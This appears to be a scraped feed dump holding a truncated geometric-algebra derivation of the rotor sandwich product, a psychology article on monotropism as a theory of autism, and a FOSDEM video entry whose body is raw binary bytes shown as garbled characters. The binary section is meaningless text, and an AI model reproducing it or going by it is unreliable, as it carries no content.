Earlier when we showed how to apply a rotor, we did it in two steps as two separate reflection calculations. While mathematically equivalent, this requires that we store the vectors that make up our rotor (rather than just the scalar & bivector components) and requires us to do far more arithmetic. Instead we’ll sandwich the input vector directly with the entire, pre-computed rotor:

Direct rotor sandwich

Let \(\v{R} = r_0 + r_{12}\v{e_{12}} + r_{23}\v{e_{23}} + r_{31}\v{e_{31}}\) and \(\v{v} = v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}\).

Now \(\v{R = ba}\), for vectors \(\v{a}\) and \(\v{b}\) so by equation 5 we have that \(\v{R^{-1} = (ba)^{-1} = a^{-1}b^{-1}}\) and equation 4 gives us \(\v{R^{-1}} = \frac{1}{|a||b|}\v{ab}\).

Our full sandwich product is therefore:

\[ \v{v^\prime} = \v{RvR}^{-1} = \v{(ba)v}\left(\frac{1}{|a||b|}\v{ab}\right) = \frac{1}{|a||b|}\v{(ba)v(ab)} \]

To keep our equations a little shorter, let’s start by just computing the first product \(\v{S = Rv}\):

\[\begin{align*} \v{S} =~& \v{Rv} = \v{(ba)v} \\ =~& (r_0 + r_{12}\v{e_{12}} + r_{23}\v{e_{23}} + r_{31}\v{e_{31}})(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ =~& r_0(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ & + r_{12}\v{e_{12}}(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ & + r_{23}\v{e_{23}}(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ & + r_{31}\v{e_{31}}(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ =~& r_0v_1\v{e_1} + r_0v_2\v{e_2} + r_0v_3\v{e_3} \\ & + r_{12}v_1\v{e_{12}}\v{e_1} + r_{12}v_2\v{e_{12}}\v{e_2} + r_{12}v_3\v{e_{12}}\v{e_3} \\ & + r_{23}v_1\v{e_{23}}\v{e_1} + r_{23}v_2\v{e_{23}}\v{e_2} + r_{23}v_3\v{e_{23}}\v{e_3} \\ & + r_{31}v_1\v{e_{31}}\v{e_1} + r_{31}v_2\v{e_{31}}\v{e_2} + r_{31}v_3\v{e_{31}}\v{e_3} \\ =~& r_0v_1\v{e_1} + r_0v_2\v{e_2} + r_0v_3\v{e_3} \\ & - r_{12}v_1\v{e_2} + r_{12}v_2\v{e_1} + r_{12}v_3\v{e_{123}} \\ & + r_{23}v_1\v{e_{123}} - r_{23}v_2\v{e_3} + r_{23}v_3\v{e_2} \\ & + r_{31}v_1\v{e_3} + r_{31}v_2\v{e_{123}} - r_{31}v_3\v{e_1} \\ =~& (r_0v_1 + r_{12}v_2 - r_{31}v_3)\v{e_1} \\ & + (r_0v_2 - r_{12}v_1 + r_{23}v_3)\v{e_2} \\ & + (r_0v_3 - r_{23}v_2 + r_{31}v_1)\v{e_3} \\ & + (r_{12}v_3 + r_{23}v_1 + r_{31}v_2)\v{e_{123}} \\ \end{align*}\]

To compute the final product we’ll write our calculations in terms of \(\v{S}\) rather than in terms of \(\v{R}\) and \(\v{v}\). This makes the equations shorter and also translates more easily into code.

Before we can do that though, we need a value for \(\v{ab}\). Since we already have \(\v{ba}\) in our original definition of \(\v{R}\), we can save ourselves having to compute \(\v{ab}\) by realising that its dot product term is commutative while its wedge product term is anti-commutative (equation 2), so we can produce one from the other just by negating the bivector component:

\[\v{ab} = r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}\]

Now we can complete the calculation:

\[\begin{align*} \v{v^\prime} =~& \v{(ba)v}\left(\frac{1}{|a||b|}\v{ab}\right) = \frac{1}{|a||b|}\v{S(ab)} \\ =~& \frac{1}{|a||b|} [ \\ & s_1\v{e_1}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & + s_2\v{e_2}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & + s_3\v{e_3}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & + s_{123}\v{e_{123}}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & ] \\ =~& \frac{1}{|a||b|} [ \tag{multiply out} \\ & s_1r_0\v{e_1} - s_1r_{12}\v{e_1}\v{e_{12}} - s_1r_{23}\v{e_1}\v{e_{23}} - s_1r_{31}\v{e_1}\v{e_{31}} \\ & + s_2r_0\v{e_2} - …


Article truncated for RSS feed. Read the full article at https://jacquesheunis.com/post/rotors/

]]>
https://jacquesheunis.com/post/rotors/ hacker-news-small-sites-43234510 Sun, 02 Mar 2025 20:10:55 GMT
<![CDATA[Me and Monotropism: A unified theory of autism (2018)]]> thread link) | @yamrzou
March 2, 2025 | https://www.bps.org.uk/psychologist/me-and-monotropism-unified-theory-autism | archive.org

Autism is still widely seen as mysterious  –  so much so that the most widely recognised symbol of it (unpopular in the autistic community) is a puzzle piece. Various psychological theories of autism haven't helped all that much, largely because all of the most established ones leave vast swathes of autistic experience completely untouched, and tend to leave people with harmful misconceptions. The one theory I think comes anywhere close to explaining the whole shebang  –  monotropism  –  has been largely overlooked by psychologists. 

This rankles with me as an autistic adult, as a science teacher and (full disclosure) as the offspring of the theory's originator, Dinah Murray. As someone on the spectrum myself, I dislike the pathologising, deficit-based framing of the best-known theories of autism, and I hate the mistakes they lead to in practice: assuming we lack empathy and have no idea what's going on in anyone else's head; painting autistic cognition as inherently more 'male'; expecting skills we're slow to pick up as kids to be lacking throughout our lives.

It bothers me as a science teacher, almost as much as it troubles me as an autist, that psychologists settled for theories of autism which simply fail to provide any explanation for so much of autistic thinking. Granted, my background is in physics and philosophy rather than psychology, but I've always understood that when your theory only partially explains the phenomena being examined, you should keep looking for a better theory. When there are persistent threads left unexplained  – such as the sensory differences so common among autistic people  –  you really need a more complete framework. Partial theories can be useful, but it's all too easy to stretch them beyond their domain of applicability, and it can cause real problems, like assuming autistic adults have no theory of mind. Maybe it's my autistic perfectionism, but I don't like theories to leave too many loose ends.

Monotropism provides a far more comprehensive explanation for autistic cognition than any of its competitors, so it has been good to see it finally starting to get more recognition among psychologists (as in Sue Fletcher-Watson's keynote talk at the 2018 Autistica conference). In a nutshell, monotropism is the tendency for our interests to pull us in more strongly than most people. It rests on a model of the mind as an 'interest system': we are all interested in many things, and our interests help direct our attention. Different interests are salient at different times. In a monotropic mind, fewer interests tend to be aroused at any time, and they attract more of our processing resources, making it harder to deal with things outside of our current attention tunnel.

The classic paper on this, 'Attention, Monotropism and the Diagnostic Criteria for Autism' largely focuses on how the theory provides convincing accounts of all the features of autism listed in diagnostic manuals, and ties them together in a way other theories fail to. The authors do a persuasive job of this, but I find the diagnostic criteria so lacking when it comes to accounting for the experience of autism that I'm not going to use that framing. Instead I will focus on some key features of autism as seen from the inside: autistic inertia; sensory differences; social differences; and focused interests. I close with some thoughts on implications for practice, the role of developmental perspectives, and potential research directions.

Autistic inertia

The bulk of what's usually referred to as 'executive dysfunction' in autism  –  difficulties getting going with things, executing plans, and tearing ourselves away from things once we've started  – are more informatively talked about as 'autistic inertia'. That is, resistance to a change in state: difficulty starting, stopping or changing direction. This is central to many of the difficulties autistic people face in life, but it is also part of what makes autistic thinking distinctive and valuable.

I'm a little uncomfortable with 'executive dysfunction' as a label for this, because it makes it seem like it's a problem with steering; it's more helpful to think about momentum of thought carrying us forward, often to conclusions that others might have missed. Thinking in terms of inertia also gives some insight into the discomfort of being interrupted, or plans changing. It's as if we've loaded a cart to the brim with thoughts and feelings, and then we suddenly have to steer it round a sharp corner.

This tendency follows naturally from monotropism. Whatever interest is most aroused in a monotropic mind tends to pull in a whole load of processing resources. That naturally makes it harder to change track, especially when you understand that the paths of our thoughts always leave an imprint in our minds, and autistic ones leave deeper grooves than they might in the average mind.

Sensory differences

It is easier for autistic people to process one channel at a time. Distributing our attention between multiple streams takes effort, and sometimes just doesn't work at all. Again, monotropism is characterised by intensity wherever our focus is, at the cost of processing resources that might otherwise be used to deal with other input or interests. This is often a problem in social situations. Autism is occasionally mistaken for deafness, especially in small children: if our attention is elsewhere, auditory input might register as an unwelcome interruption we would much rather ignore, or it might not register at all.

Conversely, if we can't tune an input out, it is often experienced as horribly intrusive. I think this is from a combination of discomfort at our attention being constantly pulled away from where we want it to be, with the tendency to feel something strongly if it's present in our awareness at all. Our brains throw a lot of resources at whatever our focus is on, which accounts for both the intensity of conscious awareness and the pain of distracting stimuli we can't filter out. There is likely a developmental aspect to this: neural pathways that receive a lot of stimulation grow stronger, so perhaps autistic people are prone to long-term hyper-sensitivity in senses receiving intense attention, and under-sensitivity in channels we regularly tune out.

Often, if we get overloaded, it helps to have controlled or predictable input. Stimming, flapping, rocking and humming provide something we can do and feel without having to think about it, and can make it much easier to filter, to focus on something else, or to deal with feelings of overwhelm.

Social differences

Many social differences are sensory differences at root. Being unable to process multiple channels of input most of the time makes the combination of spoken words, body language and eye contact tremendously challenging. Add autistic inertia to the mix, and we can also see why autistic people often need more processing time and can find the back-and-forth of neurotypical conversation difficult to keep up with.

Monotropic processing also explains the literal-mindedness that autistic people are notorious for. Polytropic minds have multiple interests aroused at any time, pulling in multiple strands of information, both external and internal. They are primed to be on the look-out for things like social implications, and effortlessly decode metaphors and indirect language. The monotropic mind tends to expect one thing to follow from another more directly than that. Most autistic people get the hang of metaphors eventually, but many still report the literal meaning of a saying tends to come to mind first, and it takes a moment's processing to substitute the metaphorical intent.

Autistic focus tends to mean we miss a lot of things that other people register, but other people probably miss just as many things  – just different things. Psychologists like Peter Vermeulen talk about 'context-blindness': a useful concept, but we all construct our own contexts all the time, and a better way of thinking about this is probably as 'a mismatch of salience', to borrow the title of Damian Milton's essay collection. I might miss your context, but don't assume you understand mine without checking.

A lot of processing power goes into modelling other minds, something that can seem effortless but is never trivial. It becomes much harder when the minds in question are very different from your own. When autistic people fail to do this, it's not so much that we're unable  – the idea of 'mind-blindness' is deeply misleading  –  but that we don't always have the processing power left over to do it effectively, when our attention is being pulled strongly in another direction.

Focused interests

Interests are at the heart of the monotropism account, and have been present in characterisations of autism right from the start. Their near-absence from the more established theories of autism, and indeed the entire psychological literature on autism, is glaring. The diagnostic criteria talk about 'restricted' and 'repetitive' interests, but the main characteristic feature of autistic 'special interests' is really how much we focus on them (or they focus us), not how restricted or repetitive they are.

Everyone's passions are repetitive; that's just in the nature of strong interests. When people talk about 'restricted interests' what they mostly seem to mean is that they can't fathom our failure to be interested in things that seem important to them. It is true that we're often powerfully interested in a few things for a relatively long time, but they do change over the years, and sometimes over much shorter time periods. For my part, I have many interests, some of them fascinations since childhood, most of them all-consuming when I get into them. Chatting with autistic adults about the things that interest them often makes the idea that their interests are 'restricted' seem preposterous.

What is true is that our interests pull us in very strongly and persistently, compared with most people. It can be hard to think about anything else when we're particularly invested in a topic, and hard to imagine how little other people might care about it. That can be a huge asset in many fields  –  intense focus is indispensible in science, maths, technology, music, art and philosophy, among others. Obviously autistic people are not the only ones capable of hyperfocus and persistent interests, but it is a common feature of the autistic psyche, and one that is too often squandered when workplaces and schools are not set up to allow it.

Implications for practice

The biggest practical thing to take away from this is the importance of meeting the child, or adult, where they are. This is not an insight unique to the monotropism perspective, but nothing else I've seen demonstrates with such clarity why it's so crucial. Treat interests as something to work with. Recognise what someone's passionate about and learn how to become part of the attention tunnels which come with monotropic focus, rather than trying to just reach in and pull the person out of the flow states that are so important to us. Never pathologise 'special interests', and don't assume that autistic interests are 'restricted'  – there are plenty of ways to get us interested in new things, it's just that they mostly involve taking existing interests and building on them.

Stability is a basic human need, and life as a monotropic person in a polytropic world is often unstable. It is deeply destabilising to be pulled out of an attention tunnel, to be regularly surprised by people's actions, or to feel you are not being understood. Much of autistic behaviour can be seen as attempts to restore some kind of equilibrium.

'Restricted, repetitive behaviours' are a natural response to feelings of instability. They allow you to assert control over what is happening, and feel safer. This is probably a useful general rule, not something that's only true in autism  –  we see restricted, repetitive behaviours in all sorts of contexts, it's mostly just that autistic people's ones stand out as particularly odd, to most people. 

Helping autistic people to maintain a sense of stability should be a priority for those around them. It's widely understood that routines can often help autistic people, but I'm not sure it's widely understood why. A lot of it is about minimising mental load: taking out things that we have to think about, so that we can maintain focus. Another big part of it is that changing plans involves such a mental shift that it's exhausting. The ability to feel in control is central to all of this, and externally imposed routines sometimes backfire for that reason. Frustrations and anxiety about control can manifest in demand avoidance, meltdowns and shutdowns at times.

The dynamically developing mind

No theory about minds is complete unless it's dynamic and developmental: we are all changing all the time, and big parts of what make autistic people different have to do with heading down different development paths. Whatever the cause, a failure to connect with the people around you, especially parents, is going to have long-term implications for a person and how they relate to those around them. Perhaps even bigger than that is the disorientation faced regularly by so many autistic children, coupled with wrenching dislocations as they are forced to change tracks again and again to suit other people's schedules. High levels of stress and anxiety have far-reaching effects on a person's long term mental and physical health, and it can be difficult to disentangle some of these from the traits that follow directly from autistic ways of thinking. 

The developmental perspective is particularly crucial because we go on learning throughout our lives, and some of the things that are impossibly difficult when we are young get much easier over time once we start focusing on them and practising. This does not mean we stop being autistic  –  all signs are that a monotropic brain is for life  –  but it does mean that many of the traits which are considered telltale signs of autism in children are only sometimes seen in autistic adults.

Different experiences in youth and throughout life, and particularly the different choices we make about where to focus our attention, are likely to account for a good chunk of the diversity of ways that autism can present. Growing up in a household where eccentricity was embraced and hyperfocus understood probably helped me to grow into a relatively confident adult, and not an especially anxious one. Neither myself nor my mother grew up thinking of ourselves as autistic, but we were allowed to be weird, and that makes a big difference.

Part of the variation in autism is also likely to be due to different degrees of monotropism: it has been suggested that the trait might follow a normal distribution, with some people being very monotropic, while others (perhaps the world's natural multitaskers and people-wranglers) are unusually polytropic. However the trait is distributed, the implication is that some people are closer to having autistic minds than others without qualifying as autistic themselves, and some autistic people have more atypical minds than others in terms of monotropism. This doesn't make the spectrum linear: there are so many different ways for autism to manifest, and so many co-occurring conditions, that no one variable can come close to capturing them all.

Implications for research

If, as I've argued, monotropism provides a common underlying explanation for all the main features of autistic psychology, then autism is not nearly as mysterious as people tend to think. We do not need to rely on theories which explain only a few aspects of autistic cognition, with no convincing explanation for sensory hyper- and hypo-sensitivity, or the intensity of autistic interests.

Why then is monotropism not already better known, despite a flourishing of attention in recent years? I believe the reasons are more sociological than psychological. When 'Attention, Monotropism…' was published in 2005, none of the three authors were professional psychologists, although one has a PhD in psycholinguistics, and had worked extensively with people on the autistic spectrum; another, Wenn Lawson, received a PhD later for further work on this theory, with their thesis on 'Single Attention and Cognition in Autism' since turned into the book A Passionate Mind. Lawson had an official diagnosis of autism, which should be an asset for anyone working in autism, but is still seen by some to undermine credibility instead. The other two were undiagnosed.

None were enmeshed in the world of professional psychology, and despite Lawson's book pointing to several possible tests, they do not seem to have known which strings to pull to make sure psychologists conducted the empirical work needed to rigorously test monotropism. Autism deserves good, well-evidenced theories, and while it is easy to point out major flaws in autism theories that psychologists have largely accepted, it makes sense that they would be reluctant to accept a newer theory from relative outsiders, however much it explains. Sue Fletcher-Watson, a psychologist in the field, points out that 'often in psychology a new theory is built on top of an empirical finding — this is what happened certainly with Theory of Mind which was rooted in a 1985 experimental study by Simon Baron-Cohen, Alan Leslie and Uta Frith. For non-autistic psychologists, there is no lived experience of autism out of which to build a theoretical model and so experimental data have to come first. This could be another reason why autistic-led theories, drawn at least in part from internal observations, struggle to make a big impact in mainstream research.'

This could be about to change. More researchers in recent years have started listening seriously to autistic perspectives on our own experiences and the theories used to describe us, and this is undoubtedly part of the reason monotropism has been gaining more attention. As psychologists dig deeper into aspects of autistic experience they have tended to overlook, including perceptual processing and the nature of autistic interests, there is great appeal in a framework that ties together these seemingly disparate strands (while deepening explanations of things like executive function and social problems). Perhaps it can also provide some helpful hints for neuroscientists. Meanwhile, insight into the monotropic mind is already helpful for anyone living and working with autistic people; I would love to see more practice-based research, looking at the impact of being able to make better sense of autistic behaviour and perspectives.

My hope is that in a few years psychologists will look back at the fragmentary accounts they have been working with, and wonder why it all seemed such a puzzle for so long. But I'm not a psychologist, I'm just an autistic schoolteacher; perhaps you should take what I say with a grain of salt.

- Fergus Murray (aka Oolong) is a science teacher and writer based in Edinburgh; formally assessed as autistic in 2010, at the age of 32.

"My mum Dinah started thinking about the mind as an interest system when I was a kid, with her PhD on Language and Interests submitted when I was eight. A few years later she read about autism in Uta Frith's book Explaining the Enigma, and I remember her excitement as she started to realise her model could easily be modified to explain rather more of this enigma than Frith or anybody seemed to have managed up to then.

So I grew up knowing about monotropism, and we have discussed it extensively since. I always knew that my way of thinking tended that way, but it took years for either of us to fully identify with it. In many ways, our autism is atypical — we are not introverted, nor socially unskilled, and our interests are wide-ranging (if sometimes all-consuming). We fit the profile sometimes misleadingly labelled 'female autism' rather well, but this was even less understood then that it is now. It took spending a lot of time around autistic people to recognise that our easy understanding of their way of thinking came not just thanks to the valuable lens of monotropism, but also because it often resembled our own."

"The photos at the top are my own; I thought it could be good to have something that illustrates the idea of degrees of branching, and after spending a while looking at satellite images of gorges and deltas this is what I came up with."

This article was originally published online in November 2018

References

Beardon, L. (2017). Autism and Asperger Syndrome in Adults.

Chown, N. (2016). Understanding and evaluating autism theory. Jessica Kingsley Publishers.

Chown N., Beardon L. (2017) Autism Theory. In: Volkmar F. (eds) Encyclopedia of Autism Spectrum Disorders. Springer, New York, NY

Fletcher-Watson, S., Adams, J., Brook, K., Charman, T., Crane, L., Cusack, J., … & Pellicano, E. (2018). Making the future together: Shaping autism research through meaningful participation. Autism, 1362361318786721.

Lawson, W. (2011). The passionate mind: How individuals with autism learn. Jessica Kingsley Publishers.

McDonnell, A., & Milton, D. (2014). Going with the flow: reconsidering 'repetitive behaviour' through the concept of 'flow states'.

Milton, D. E. (2012). On the ontological status of autism: the 'double empathy problem'. Disability & Society27(6), 883–887.

Murray, D., Lesser, M., & Lawson, W. (2005). Attention, monotropism and the diagnostic criteria for autism. Autism9(2), 139–156.

Murray D. (2018) Monotropism – An Interest Based Account of Autism. In: Volkmar F. (eds) Encyclopedia of Autism Spectrum Disorders. Springer, New York, NY

With thanks to Dinah Murray, Sonny Hallett, Richard Woods, Nick Chown, Niall Leighton, Damian Milton and Sue Fletcher-Watson for their help refining my thoughts.

]]>
https://www.bps.org.uk/psychologist/me-and-monotropism-unified-theory-autism hacker-news-small-sites-43234429 Sun, 02 Mar 2025 20:02:18 GMT
<![CDATA[Disrupting the destruction of our natural world with openness]]> thread link) | @protontypes
March 2, 2025 | https://mirror.as35701.net/video.fosdem.org/2025/h2215/fosdem-2025-5972-disrupting-the-destruction-of-our-natural-world-with-openness.av1.webm | archive.org

=-2ýL„£c”áûg½ 6’[”ŒôЋf’_Tki°‡¹/LýÖB3ìzŸÝ�;}kÁ#hݬû^ý7ÿÙ\˜¾:¸9ÓUÖîÙ=�nR‘õZ¶ó ÉßýÚÀcnãeÖˆ+™�­ˆ¤6Xi›@A‹¢4ôҽ݃C6µ�ñ­]@�2/`ÃÀ£@�‚ °€ø²'{ižÁúŽwþ‡n4®ÏZÖ }†%kRÝ�É©c‰5íâfyÈ1õ\+nI¡NÛIŽ?�´•”YE“|åjêZ[àGèŠ×n«êù=âÛOp‚œ_Wã‚ÿ §/œ»^lI,7w¦¿ZýD|º"¾xb‡ÛŠùÊG;ÿˆ–*ѾsªÔ»ÂÏ+¦9'áQZ_{p?�†£‡� ·è£@ž‚ Ä€øÑ懊{/' iЪáqMëÃ9z¡QËÛå> Oã‚7«^WªóÚ ×S<ò J…¼ü¦Clá¡ò¦ Šá:@(Œ2ëº1톯ózºÚ)äD%6^f¸®šƒ¹C »ÛÑ÷öáÚþ# �WàèWnF¾„†q£-�ž‹<îÆešÆ2G¸Ðu¢¤é¼* #mÕ”úÈú­¾£@½� Ø2¶0ú€ýM:@wP0HPH¢C\?’9È=ä5þ*pb*áì‘®AÏ!?ð…Cäòÿ ÷ç×ç§·è×·w7—¨熖¦×ç×§†èø8Ø÷çØèGÇØwH8(hÈ¡˜Èçè×÷øW÷ø(8'Ç÷x8(gíè€À€@`@ Â5@Î:dVnÉ,º³ù¯È»á6É€ÉbÅê2ÿ>èõ`>›qtP£@ž‚ Ø€øçŽ‚,s†�þj°D9ïZ“$&÷WZ�¦ìIØË.Ñüh2Lg¢{¬fÐ/µ¬LoÉÓ†S:%qÿ pÌJï…,„�çžõÖ%9Î,´CË:¡ä0;aK%)3qþ\¼¯i1Q”äp¸ÕR”M,èŽ÷6¸ªëèµBþ6Ih¤Ä<~ËŽ·‡ÀçÓÃP„ïLQûçÊçÎz £@ž‚ ì€øåó ìôزêùá„ω²8lïé¨Ë9Ëäký*!¿úÓ­èmïz¸¿,.Ѳ¿‘Ìù¥]\¾N:oÚD±¦'�ÛžG?x†ŽN�׎GÛ@`h´¿fº�b eXJR§å2öèl¸ßã¶è©žÁ,ýŽ år˜ó%Ùs‡ñcìöÿ­:k€Žn?–™¾Spød$£‡� ùØ£@™‚ €øå�…§$€ÖlWãuÈ SØ(ÿ-.E5‰;dfÛýŽÂ°a)x¿îØc¼=-²ÎäX9êë°I•�Ÿë›gïû�ð 7i¦²�!‹’œò6kcdiþíwgĈ%’�ñ{8Œ,NçÀìÈ“2œã)]fd© #vÐj»÷UÙèÜ)¥<�#SÓ’NÊ`“ô6£@—‚ €øçEǾì–àEÛ·Þ-#["gÔ"�¦Ljü @肇âx”m¿r]¿ÏKæy€?B‡_Eܼšé~Йæø9¾Êxg;J6$îÏ ›?‡e5i:â…rŸ5¤…‹=DKõÓNœÌA™×ÃÍU˜?BÈ9ÊÖV9lr&5´xQÝ”{o¶°ÍÀëjsø§8c[BÂC£Bw� 2¥(( �<�ÀWœð ¿€B‚Eáü‘ÎAï!¯ñT”¨�Wd�ry ÿ„ ä ÿ�¯ø_¿>¿¼¾¿?¾½<9=<À?<µ4¶>¿½;¶¿ÀÁB@¾@@???À?@B>¾ÂºÀÁBÆÅŒ@¾ÀÁ¾¾À>¿¿ÂÀ¿AÂ@½À;Â@?Á¿ìÄó‹ +*°ƒ#X[H2$2‰²WjµæT�wú5  ÂÄÂÄ%e*Hù=qùN× qîÖñA††/ì°Ói>fËùngÛ¬æÓþJ–ß°L¿Ó[�Jx²}n80‚Wš�9„Ì,�Ä“.̹q·„�¢ø÷“¤/ ŠG§ïÌ·´ÃäGhò®ÁOšXÚ1'±Ç+Têy˜a¾ eÕÂrDŠók>é v�/”o;r@AЫg3´�Hg|Ù‡g}omß—‹-6Âçƒä_ÇQ�o9üÞ—0¶Á³ˆpóQŠOxž â ÓÝŠìWTÇÛŽ�ÊX€3[´*µe¥1ÈWÖëÛ ?ü·™ö6Fl<–¥ù½öó2È0þ€ûŽ:@}ê°FPH¢C\?’9È=ä5þ*pb*áì‘®AÏ!?ð•Cäòÿ ÷ççç§·ç÷×§‡'§—÷ç–––·çç§vרX×è×è÷ègçȇH(XÈ¡¨È7ÇØç÷øxè(87¸ˆHèGí¨€À€@`@ Â5@ØÞìæM¢ëÙ�º¯3ßã)ùÚ ðÊßHqæŒ�,m[l�Ð ç¥p¥8œÿ’BÀ£@š‚ (€ø’.§-ß~<mü$uwP� ¨3ŽÂºT¸˜P‚áëq†¦0Éq¼wÂy=ùChKZ˜¢zv|ý„­]ÿ÷#Î w3wnßÞF,º4¨ÖàðZa¿p€¨nñ©3J”§�wô´ÞKª…ÁÌŠE‘5.£)ÊFRµX&èŠ×Û$ê 2Údî©iû¬ËÍgæ>rBê®aÈ,£‡� <è£@˜‚ <€øóªŒ)[‰‹.@7ã—“ÈMx ŽXÖ•Ÿ:È£ùÿòÓíÁ.Ý)ê}f¶~.ínZCG_˜Æ€Ëˆ©AŒ ªxo ݱ‹©Ú\ÒN“¡Å4óÜ2‚{~«^RWáXë€k]ú‡‚L¤k ÉÙõ˜ëö¶ɶ7Yñ8/àj4û v áÌð·)÷.Ú{·{o±Ë\¶$$3•£@•‚ P€ø)ÇVÍ©  V©µ¨PØ É}ðÆ)q&H­åwÏ+ÓR럣ƒ¬:@*®�‘f$ÏèiE [«_ÜY,ùlÌ]ª…f‰›® w¦ Ò¨—(î×CÒ² ješëæUüžrîò…ú#î*�}+#†ÚO4ì&¥BZÔ…U2C’Ì�B¸°Ú=#í£@ÿ� ]2ø0€üA:@D…0HPJ¢C\?’9È=ä5þ*p#b*áì‘­q¿!?ð„”òÿ ÷ç×÷—Çç÷×§‡'§—÷ç–¦–Ççç§vèX·÷ç÷èè7çØWX(x¸¡XÈ'רøXè88¸ˆHøG툀À€@`@ Â5@Ù1Œ%„§"có—ýã/²'ΗMÌMF¹?‹÷"ÿ‡Ðç¢#Š?‹0 ŸMdcT'�Ip&Ôô§¢ä¿Ô)•æï®º(#ÊAÊã1DhòûŠÛ¥ó›ïó¬ðÿgJ°ö¬Ë÷²�Éà£@”‚ d€ø\úªeþ/Ñ<Ú°Xöß§ý·hÃÞ½X‡POÙã^î©=¦T êSÞH¾@äjæa¾Ì×JÕ&Bå蟱8^vôO–Šº3cå89Ÿa.ÈÊÉ~¢ µ�ÜO�¦,E=þ@?'AΧ¯Y•Ž<„è¯�Ô–£x7£Rj�  2Ê(‚‰ �A‚ A€xÊg¦ÄÊ$UÃù#zã¾C_â¨$($Q!®Éäòÿ`Ô1õáì‘Ï!Oð¯~}~z|€~{xr{|€~ylin|zym€~‚�‚‚�~�…}zˆt‚„‰Œ €€‚~}���‚~ƒ…}}�w…�…€ãˆ ýzœÂú©¶QӀěTº't×ã‹hV “®XHé<¬+ÍKKøñ�±v2�ج²S�iKÇL$sžFq0‚‘(_¨*¯mˤ€SòEõ*'¹¨MEQ'm}˜Æº†¯+]äé¨ÁÙàµhÐÂ=bäfàÿâzŸö{tOØÆ©ææ¬\_>3…±ÉÛec=iüÑQé¡›ç™×\G S9�ÿX¶¬³G[F÷U ùkƒ[>n#To’ní…ž½ýýWû­™„`Ì5x§K^j@p¹Þ€º9'ÍÌ$èóœ°MV}�½²dn•(GèS˜‹l-�mÑÔ¼³T˜§ù¥ŠÁ×=~‰µl챃œÆŸœ^7ðâj ÂÕltoÔ~Ons¹lÅúg£ Ó �¿�(ßá†Ì±ÿp$��þ~gwPÓI6v/ØÐ?vÛ·Gÿ·—g$fµ¦#…^¼^^éÈ@©03{ A–mÁu§†T&ìÇ…�`kW²Q¶eÇGŒÖ»¤«í”½ug‹õ}7VJ¼Ø|)7Ø`]Ϋ¿¥—Ì‘ü(: §º¥ÛWK›Z¸L¤J«ŽaX,ó¢v¶FÕ³SV¿OjÞ½Rl�‰þ÷ZÅG§ ›Î *pšãG³±z@êºüîÚMÛS@ïOIòµ"»ÚÅÛˆþGƒs�éêsõ‹mQÔ¹…n}êÜI ƒ‹±Þ¼Qu”[%4¯é¸Ÿo» SÅUàœA•àA‚'Ì÷hØsò ƒÞʇ U]ˆ:Àuo©/£žÓŠÈ Ž™í,�T¥D¿’¡“ó4‘·ÎÉиJ,Æê Q–Ƈ½ß“ÈìC˜KXAšð‚„#$"`´D Ç–{{ÔUG­á8Þ̱ËÕ03pÙ`ô‘¥3Ð�zß%e¼l°>¡ZbÓùø’�ÊV“BÛËò‹Ó5¥ptµš#6+ÌJ‡Ò~’º  )û�ou£[Bõ[_õΜìÆÞûü,nÃ"R1qg~v«²7RªÈ0aÂã 'µ)̼ãÒKÞAG ^§–©¦¤?o5 qPd<óØIòg–Ï5p"ž~W³Uk_þ ‰Ø,2¿äö> “¯Bo\Ü�YúUháfo½Qk©YM ÕÀx/(·°”óÏí á3•5 Ÿöëd_(·)�“iÝ…ibŽÓûé�¨WêÙÓ¤îj£ŽŸ�#:”ÓSv0R.¯]èD@ŽvF4ž®�ŽA"Q®ƒ•«XSmïÕæ£J‰g€ÂÒœ�È÷FNºä¤@uÙ]gÜÆø£vØãßIM ƒ}pøˆÿnw7,úŠ[�wM Y¾úù\B�“»;úwÄÊeO—~5(À®”Âà @Ž'Ÿó*Ζº*žErÇdˆ@!ꯗþYn=V÷ A³B§ÑK&ÃFê$è–h{’ÇÊKA¡'BÙñ6Aá<ªÕ¹|}Ê×ï–™– ¡~¯™W#ôôG ß7ª‰Ü/ñ¾ë>ƒ„ž™K;Skzíe¢‚VJ÷á´¶�²k~P4Œ,³­Z’¦¼oÂG*Ü—Å«…åŠå^o~ÎãÈ¥Ø@£éÝ5J\íõ¯¸ž´ø•gëÀã7AÞ}@i'nrè÷»Q—ðÛdÓ3#F/▊Ή<�±RÒñ.MÍm­ÛMßÓ yËú3ìiB.®÷Ù?�Ã|Eä“?Q©Á„6!J½™¯O¿¨Ø›Ž9ÁìÑpø.³¹€°w+ðâÒ#O®Ö;€�{Ú‡šRzí!ö¦~r#—}EišŒL<±à�£lCãZ¼e=]«ª±AÕZÓ¯îZîÁ—,L´L1ù²¹Á¾ÙHqo§ÃOD¥–¿¹%õ:$lòµ[úª ö ¨Í˜¡+v~#-ìàâ(¸D–N¢³‹3l[©Äui�@FIÅØ8DþÂtÖ'§áëq"®²Œê3È‚W]}¹ˆ±ùƒÝõ¥Æ’±ys€ó䨎µÆY·ÍHâEÛEý(Ý`eý�Òä¸ÿ–6lpxp�m ~Ø_ƒ\ŸÚÎé ¿ËŒÒ~¼ò?·ðÜ6GóùÔ96û#år¨®+àüáú¦ 2Ÿ,ÆmNÔOsàµÜe$¤uëý†EºXâý³m³²¹îyz£RŠ*®/DPšÇšJ¨·Á»¤9:~csnþ÷7×,%^|,›sjGŸm“f$|B€�™)/™Ø>Œ~á»äÏhx:Ve¼æ·ìó/¾¬Rž¹L‰Ž(¦äùWyÜ §�¸ú/ð•æ 9_®üÄC¬Ss;óP¶ÁêbÀ|]E®P4uCØî)x�E’z•9ü‘.|,Š•&«þâ<ú©¤g¸£qžUtZ«rÖàÏù  